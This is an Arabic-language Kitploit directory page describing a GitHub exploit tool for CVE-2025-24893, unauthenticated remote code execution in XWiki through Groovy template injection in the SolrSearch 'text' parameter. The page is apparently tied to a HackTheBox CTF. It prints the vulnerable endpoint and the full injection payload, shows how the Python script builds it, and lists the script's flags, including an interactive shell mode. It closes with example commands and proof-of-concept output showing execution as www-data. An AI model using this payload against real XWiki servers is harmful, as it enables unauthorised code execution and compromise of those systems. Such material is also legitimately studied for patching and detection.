Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-24893-XWiki-SSTI-RCE — CVE-2025-24893 – استغلال RCE بدون مصادقة عبر SSTI في XWiki (HackTheBox CTF) | Kitploit
أدوات/GitHubGitHub/rippsec/cve-2025-24893-xwiki-ssti-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراق
GitHubrippsec/cve-2025-24893-xwiki-ssti-rce

CVE-2025-24893-XWiki-SSTI-RCE

CVE-2025-24893 – استغلال RCE بدون مصادقة عبر SSTI في XWiki (HackTheBox CTF)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
54منذ 5 أشهرلم تتم المراجعة بعد
مشاركة

CVE-2025-24893 — تنفيذ الأكواد عن بُعد في XWiki عبر حقن القوالب (SSTI)

نظرة عامة

الحقلالتفاصيل
CVECVE-2025-24893
البرنامجXWiki
الثغرةحقن القوالب من جهة الخادم (SSTI) → تنفيذ الأكواد عن بُعد (RCE)
المصادقةغير مطلوبة
درجة CVSSحرجة
السياقاكتُشفت أثناء مسابقة HackTheBox CTF

الوصف

يوفّر XWiki نقطة نهاية SolrSearch (/xwiki/bin/get/Main/SolrSearch) تمرّر مدخلات المستخدم عبر محرك قوالب Groovy دون أي تنقية. يمكن لمهاجم غير مصادَق حقن تعبير Groovy عبر معامل الاستعلام text، محققًا تنفيذ الأكواد عن بُعد على الخادم الأساسي.

التفاصيل التقنية

نقطة النهاية المعرّضة للثغرة

GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=<PAYLOAD>

آلية الحقن

يُدمج معامل text مباشرةً في سياق ماكرو XWiki ويُقيَّم بواسطة محرك Groovy. يهرب الحقن من سياق القالب باستخدام }}} ويفتح كتلة {{async}}{{groovy}}:

}}}{{async async=false}}{{groovy}}println("<CMD>".execute().text){{/groovy}}{{/async}}

ينعكس المخرَج في نص استجابة RSS ويمكن استخراجه عبر التعبير النمطي (regex).

بنية الحمولة (Payload)

payload = '}}}{{async async=false}}{{groovy}}println("' + command + '".execute().text){{/groovy}}{{/async}}'

الاستجابة بتنسيق XML/RSS — يظهر مخرَج الأمر بين علامتي [}}} و]</ مع ترميز الأحرف بصيغة HTML.

الاستخدام

python3 exploit.py -t <TARGET> [-p PORT] [-s] [-i | -c COMMAND]
العلامةالوصف
-tاسم المضيف الهدف أو عنوان IP
-pالمنفذ (الافتراضي: 80)
-sاستخدام HTTPS
-iوضع الصدفة التفاعلية
-cتنفيذ أمر واحد
-vإخراج تفصيلي

أمثلة

# Single command
python3 exploit.py -t wiki.target.htb -c "id"

# Interactive shell
python3 exploit.py -t wiki.target.htb -i

# HTTPS on custom port
python3 exploit.py -t wiki.target.htb -p 443 -s -i

التبعيات

pip install requests termcolor

إثبات المفهوم

$ python3 exploit.py -t wiki.editor.htb -c "id"
[*] Executing command: id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

المراجع

  • الإشعار الرسمي من XWiki
  • إدخال NVD
تنزيل الأداة